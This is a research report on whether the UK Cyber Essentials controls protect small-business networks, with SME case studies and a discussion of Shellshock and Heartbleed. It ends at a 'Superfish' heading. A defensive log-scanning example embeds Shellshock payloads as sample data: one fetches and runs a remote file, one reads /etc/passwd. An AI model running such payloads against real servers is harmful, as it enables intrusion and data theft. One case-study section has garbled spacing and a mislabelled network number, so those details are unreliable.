Cyber Essentials was introduced as a government-funded scheme, first published in April 2014, in the interest of national security, to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to use in mitigating the 'bottom 80%' of remote cyber-threats[3].

The scheme, built to provide an implementable version of the '10 Steps to Cyber Security'[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations, including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].

The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].

The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, in either hardware or software form, is important for them to be fully effective.

Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control: Ensuring that only those who should have access to systems do have access, and at the appropriate level.

Malware protection: Ensuring that virus and malware protection is installed and is up to date.

Patch management: Ensuring that the latest supported version of each application is used and that all the necessary patches supplied by the vendor have been applied.

Figure 2: Cyber Essentials Security Tools

The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to enterprises of all sizes as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in including 'Bring Your Own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as those in manufacturing and retail, are applicable to CE but hold additional vulnerabilities, due to their nature, that are not considered.

Aims

The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

"Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct."¹

To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from the collected data are considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.


Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data, through interviews and a survey, regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.

• Composition of a list of suitable vulnerabilities that remote attackers could exploit by means of commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE controls.

Data Collection

In order to analyse the effectiveness of the Cyber Essentials security controls, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews, and abstracted to reduce redundant complexity and to remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.

Interviews

The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.

Survey

The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME, to gauge its size; the local and remote services available; the operating systems used on the service providers and workstations; the current security policies in place; and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly, to closed groups of security-interested SME representatives.

Vulnerabilities

A total of 200 vulnerabilities have been randomly selected, in equal numbers, from the CVE-2013 and CVE-2014 annual vulnerability lists published by MITRE.² Any vulnerability found to be unsuitable for analysis was replaced by a new random candidate.

In this report we use the MITRE organisation's definition of a vulnerability, which they state as:

"An information security 'vulnerability' is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely 'open' security policies in which all users are trusted, or where there is no consideration of risk to the system)."

(As shown on Mitre.org's Terminology page[6] in March '15.)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials

To warrant a CVE entry in the MITRE list, an individual vulnerability must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity; or

• allows an attacker to conduct a denial of service.

High-Profile Vulnerabilities

Three specific high-profile vulnerabilities were also taken, in addition to the 200 randomly chosen, and assessed for the extent to which the Cyber Essentials scheme would reduce the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with their respective potential to harm operations.

Mitigation Assessment

The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
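As an added example (not code from the report or from the Cyber Essentials scheme), the following Python automates the applicability and mitigation classification described in this section for software with dotted-numeric version strings: a CVE is applicable only if a product it names is in the network inventory, and an applicable CVE is then placed in one of the report's three outcomes according to whether Patch Management can return the system to a secure state. The affected-version ranges are transcribed from CVE descriptions in the CVE Details appendix; the inventory, the product keys and the "EXAMPLE-UNPATCHABLE-DEVICE" entry are constructed for illustration and are not real products or CVE identifiers.

```python
"""Classify CVEs against an SME software inventory (added example, not the report's code).

Affected-version ranges are transcribed from CVE descriptions in the report's CVE
Details appendix; the inventory and the unpatchable-device entry are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Ordered from best to worst; the worst outcome wins when a CVE names several products.
OUTCOMES = ("already patched", "mitigated", "partially mitigated", "not mitigated")


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '8.1.3' into (8, 1, 3) so versions compare numerically.

    A string compare would put '10.1' before '9.2'. Only dotted-numeric versions
    are handled; vendor strings such as Junos '12.1X44' are out of scope here.
    """
    return tuple(int(part) for part in version.split("."))


@dataclass(frozen=True)
class AffectedRange:
    product: str
    fixed_in: Optional[str]       # first fixed version; None if the vendor has shipped no fix
    branch: Optional[str] = None  # restrict to a release branch, e.g. "1" for "1.x before 1.4.17"
    patchable: bool = True        # False models the report's 'inherent flaw' cases


@dataclass(frozen=True)
class Cve:
    cve_id: str
    ranges: Tuple[AffectedRange, ...]


def in_branch(installed: str, branch: Optional[str]) -> bool:
    """'1.4.16' is in branch '1'; '2.0.26' is not. No branch means every version."""
    if branch is None:
        return True
    prefix = parse_version(branch)
    return parse_version(installed)[: len(prefix)] == prefix


def is_affected(installed: str, rng: AffectedRange) -> bool:
    """True if the installed version lies inside the CVE's affected range."""
    if not in_branch(installed, rng.branch):
        return False
    if rng.fixed_in is None:
        return True  # whole branch affected, nothing to compare against
    return parse_version(installed) < parse_version(rng.fixed_in)


def assess(cve: Cve, inventory: Dict[str, List[str]]) -> str:
    """Classify one CVE against {product: [installed versions]}.

    'not applicable'      none of the named products is in use on this network
    'already patched'     in use, but every installed version is at or past the fix
    'mitigated'           affected, and a vendor fix exists for Patch Management to apply
    'partially mitigated' affected, but no fix has been released (vendor dependent)
    'not mitigated'       affected, and no patch can fix it (replace the product)
    """
    applicable = False
    worst = 0
    for rng in cve.ranges:
        for installed in inventory.get(rng.product, []):
            applicable = True
            if not is_affected(installed, rng):
                continue
            if not rng.patchable:
                label = "not mitigated"
            elif rng.fixed_in is None:
                label = "partially mitigated"
            else:
                label = "mitigated"
            worst = max(worst, OUTCOMES.index(label))
    return OUTCOMES[worst] if applicable else "not applicable"


def summarise(cves: Tuple[Cve, ...], inventory: Dict[str, List[str]]) -> Dict[str, int]:
    """Count outcomes across a CVE list: the per-network figure the report tabulates."""
    counts: Dict[str, int] = {}
    for cve in cves:
        label = assess(cve, inventory)
        counts[label] = counts.get(label, 0) + 1
    return counts


# Ranges transcribed from CVE descriptions in the CVE Details appendix.
CVES = (
    Cve("CVE-2014-4617", (AffectedRange("gnupg", "1.4.17", branch="1"),
                          AffectedRange("gnupg", "2.0.24", branch="2"))),
    Cve("CVE-2014-6040", (AffectedRange("glibc", "2.20"),)),
    Cve("CVE-2014-8638", (AffectedRange("firefox", "35.0"),
                          AffectedRange("firefox-esr", "31.4", branch="31"))),
    Cve("CVE-2014-7927", (AffectedRange("chrome", "40.0.2214.91"),)),
    # Constructed placeholder, not a real CVE or product: a flaw no firmware update fixes.
    Cve("EXAMPLE-UNPATCHABLE-DEVICE",
        (AffectedRange("example-router-firmware", None, patchable=False),)),
)

# Constructed inventory standing in for one modelled SME network.
SME_INVENTORY = {
    "gnupg": ["1.4.16", "2.0.26"],
    "glibc": ["2.19"],
    "firefox": ["35.0.1"],
    "chrome": ["39.0.2171.95"],
    "example-router-firmware": ["1.0"],
}

if __name__ == "__main__":
    for cve in CVES:
        print(f"{cve.cve_id}: {assess(cve, SME_INVENTORY)}")
    print(summarise(CVES, SME_INVENTORY))
```

Running the block against the constructed inventory classifies the GnuPG, glibc and Chrome entries as mitigated (a fix exists for Patch Management to apply), the Firefox entry as already patched (35.0.1 is past the fix), and the placeholder device as not mitigated; a range with no fixed version and a patchable product yields the report's "partially mitigated" outcome.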


Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where every software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in terms of physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in the software and hardware used in each SME network configuration is included.

The full table of the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model. The SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials controls, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, and will be mitigated once a security fix has been released. Whatever security tools are deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk and to respond quickly, with patches, to vulnerabilities as they become apparent. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each such case this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For devices that are fundamentally flawed from a cyber-security standpoint, no level of security tooling on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules have been put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers, and are accessed and secured via combinations of smart cards and PIN entry devices also supplied by the banks.


User Access: Employees access the internet from both their individual workstations and additional devices such as smartphones (technically the latter is not permitted by policy, but the policy is not strictly enforced). Internet access is slightly filtered, with access to Facebook blocked by the router.

Access logs for network operations are not created, and any machine in the office can access the whole network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it is in the firing line for a large number of browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the SME ends up with several different browsers, and several versions of each, to cover all its requirements, exposing it multiple times over to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure: The second SME participant employs 20-25 staff, based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch/access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled (note that Windows XP left extended support in April 2014, so auto-updates no longer deliver security patches for it).

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server, database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest potential vulnerabilities overall, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in the network, responsibility is handed to the chosen service provider. A certified and reputable cloud services provider should thus be sought, to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using theirown devices unless it is validated by thecompany head - in which case no others mayshare that device Workstations are connectedto one switch via Ethernet and share a virtualLAN with other employee devices

Network Equipment includes an externalDell PowerEdge Server one TPLink SwitchAccess Point and a TPLink DHCP Router

Figure 9 SME-3 Network

Services Employee devices sharing thenetwork can use Windows Folder SharingEmployee devices include OSs OS XWindows 7 amp Windows 8 with auto-updatesenabled

All services are provided by cloud serversvia HTTPS Email Files amp Database as wellas management tools these are used daily

User Access Employees have no restrictionon their internet access and commonly useall major browsers for compatibility testing

Guests are not permitted on the networkbut may join a rsquoguestrsquo network through thesame access points with a mobile device Wi-Fi logs and Cloud Service Access logs aregathered and actively monitored Employeescan access the network from a validatedmachine but the SMErsquos policy is thatall machines should have anti-malware and

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28

strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity

Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network

Figure 10 SME-3 Vulnerability Mitigation

The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place

When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content

SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and its equipment consists of a single desktop PC and two company laptops connected through an ADSL router; the same router also provides the internet connection for guests. An alternative router is available as a manual fall-back connection to the internet, but only for company equipment.

The guest network is split from the office network by a secondary access point name (SSID) that filters its traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed over SSL-secured connections (mainly HTTPS).

User Access: User access is not mediated in any way and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for its mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation of the guest and office networks, no other network security measures are in place. The office PCs do, however, have automatic patch installation configured and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, and so exposes a wide variety of attack vectors through the web.

The services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risk should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services it uses have not either, leaving them open to attack.

Survey Responses

Data gathered from survey responses affords a much broader look at typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site. This is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Locally, file, email, database and domain servers are the most common local services, each present in more than a third of SMEs. Remotely, email, web hosting and file sharing are the most common services provided.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine on the shared LAN exposes the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, a password policy and a data-loss prevention scheme in place; these are the most common security measures among the SMEs contacted. Below these come access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents' Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities, in a network behind an ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.

Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information is likely to give strong consideration to local file servers.

The specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The web development SME requires employees to connect to many web servers remotely; the survey respondents match this case with their use of external web-hosting services. That said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The hotel services SME represents a very basic local network using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. It is also representative of many SMEs with little or no online presence.

Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media during 2014 and early 2015.

These are of particular note because, while they may not be the most damaging attack vectors (although some are very serious), they caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known as "BashDoor", Shellshock hit the news because it attacked the Linux server environment, and did so in a particularly effective manner.

"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix."

CVE-2014-6271 [13]

The flaw let attackers execute arbitrary shell commands on a target by controlling the contents of environment variables that Bash would later import: Bash treated a value beginning with "() {" as an exported function definition and then went on to execute whatever followed the closing brace. The bug was not enough by itself to compromise a system; it needed another service that places attacker-supplied input into the environment before invoking Bash, such as a CGI script behind Apache (where request headers become HTTP_USER_AGENT and similar variables), an sshd ForceCommand restricted account, or a DHCP client hook. Where such a path exists the results can be devastating, as it lays the entire system open to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services, mail servers for example, as they would potentially have no idea that they had been compromised.
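The CGI path just described leaves a trace that even a small SME can look for in the web-server logs it already keeps. The script below is an added example written for this edit, not code from the original study or from any of the SMEs: it scans Apache combined-format access log lines for the Bash function-definition prefix in the Referer and User-Agent headers and reports the command the request tried to run. The log lines are constructed for the purpose (documentation-range addresses), and the prefix pattern is deliberately looser than Bash's exact "() {" check so that the spacing variants seen in scanner traffic are also caught.

```python
"""Spot Shellshock (CVE-2014-6271) probes in Apache combined-format logs.

Added example for this report; the log lines are constructed, not real
traffic, and use documentation-range addresses.
"""
import re
from typing import Iterable, List, NamedTuple

# Apache "combined" format: the last two quoted fields are Referer and
# User-Agent, which mod_cgi exports to a CGI child as HTTP_REFERER and
# HTTP_USER_AGENT. That is how a crafted header value reached Bash.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Bash imported a variable as a function only if its value began with "() {".
# Optional whitespace is matched on purpose so "(){" style variants are caught.
FUNC_PREFIX_RE = re.compile(r"^\s*\(\)\s*\{")
# The bug: everything after the function body's closing brace and ";" was
# executed. Capture it so the analyst can see what the attacker tried to run.
TRAILER_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;\s*(?P<cmd>.*)$", re.S)

# Constructed sample: one normal request, two probes carrying commands, one
# bare fingerprint probe, and one malformed line the scanner must skip.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:09:58:01 +0000] "GET /index.html HTTP/1.1" 200 4312 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/32.0"
198.51.100.7 - - [25/Sep/2014:10:00:12 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 71 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x'"
198.51.100.9 - - [25/Sep/2014:10:02:47 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 71 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.37.0"
192.0.2.22 - - [25/Sep/2014:10:03:00 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 71 "-" "() { ignored; }; "
this line is not in combined log format and must be skipped, not crash the scan
"""


class Finding(NamedTuple):
    ip: str
    path: str
    field: str     # header that carried the payload
    command: str   # what Bash would have run; empty for a bare fingerprint probe


def find_shellshock(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per request whose Referer or User-Agent carries a
    Bash function-definition prefix. Lines that are not in combined format
    are skipped rather than raising."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        path = parts[1] if len(parts) > 1 else m.group("req")
        for field in ("ua", "referer"):
            value = m.group(field)
            if not FUNC_PREFIX_RE.match(value):
                continue
            trailer = TRAILER_RE.match(value)
            command = trailer.group("cmd").strip() if trailer else ""
            findings.append(Finding(m.group("ip"), path, field, command))
    return findings


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG.splitlines()):
        print(f"{hit.ip} {hit.path} via {hit.field}: {hit.command or '<probe only>'}")
```

Run over a real log, a hit against any path under /cgi-bin is the signal that Bash may already have executed the captured command, so the host should be treated as compromised until the command's effects (downloaded files, new cron entries, outbound connections) have been checked, not merely patched.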

"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to read the active memory of a target machine through a buffer over-read. This allowed attackers to access private credentials (or indeed anything else) held in the RAM of the target process.

As described in the original CVE report:

"The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug."

CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, in both the open and closed source worlds, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as yet unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on their individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and the other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects. Patching also does not undo a leak that has already happened: because the private key may have been read, certificates should be reissued and session credentials and passwords reset once the fixed version is in place.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
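The over-read is easiest to understand as a missing comparison between two lengths: the payload length the peer claims and the length of the record the server actually received. The Python simulation below is an added illustration written for this edit, not OpenSSL source. It models the heartbeat message layout of RFC 6520 (type, two-byte payload length, payload, at least 16 bytes of padding) and a small stand-in for process memory, and places the bounds check that 1.0.1g introduced beside the trusting behaviour of the earlier versions. The bytes placed after the record in `ProcessMemory` are constructed stand-ins for whatever happens to sit beside it on the heap.

```python
"""Heartbeat bounds check behind CVE-2014-0160, as a stand-alone simulation.

Added illustration for this report, not OpenSSL source. Message layout per
RFC 6520: type (1 byte), payload_length (2 bytes), payload, padding (>= 16).
"""
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16          # minimum padding the RFC requires


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a HeartbeatRequest. A benign peer claims len(payload); the
    Heartbleed probe claims far more than it actually sends."""
    if claimed_length is None:
        claimed_length = len(payload)
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_length) + payload + b"\x00" * PADDING_LEN


class ProcessMemory:
    """Stand-in for the server's heap: the received record is followed by
    unrelated data (constructed secrets here) that a correct handler must
    never touch."""

    def __init__(self, record: bytes) -> None:
        secret_neighbours = (b"-----BEGIN RSA PRIVATE KEY-----MIIEow"   # constructed
                             b"Cookie: session=a1b2c3d4" + b"\x00" * 32)
        self.buf = record + secret_neighbours
        self.record_length = len(record)   # what the TLS layer actually received


def vulnerable_handler(mem: ProcessMemory) -> bytes:
    """OpenSSL 1.0.1 to 1.0.1f: trusts payload_length from the peer and
    copies that many bytes into the response, reading past the record."""
    _, claimed = struct.unpack("!BH", mem.buf[:3])
    payload = mem.buf[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload


def fixed_handler(mem: ProcessMemory) -> Optional[bytes]:
    """1.0.1g: a record too short to hold even an empty heartbeat, or one
    whose claimed payload plus header and padding exceeds the received
    length, is silently discarded (no response at all)."""
    if mem.record_length < 1 + 2 + PADDING_LEN:
        return None
    _, claimed = struct.unpack("!BH", mem.buf[:3])
    if 1 + 2 + claimed + PADDING_LEN > mem.record_length:
        return None
    payload = mem.buf[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload


def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Whatever the server echoed beyond the payload the client really sent."""
    return response[3 + len(sent_payload):]


if __name__ == "__main__":
    probe = build_heartbeat(b"ping", claimed_length=0xFFFF)
    leak = leaked_bytes(vulnerable_handler(ProcessMemory(probe)), b"ping")
    print("vulnerable handler leaked:", leak[PADDING_LEN:PADDING_LEN + 40])
    print("fixed handler response:", fixed_handler(ProcessMemory(probe)))
```

The point to take from the fixed handler is that the check is against the length the transport layer measured, not a length the peer supplied; a real server cannot know what lies beyond the record, which is why the only safe response to an oversized claim is no response at all.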

"Superfish"

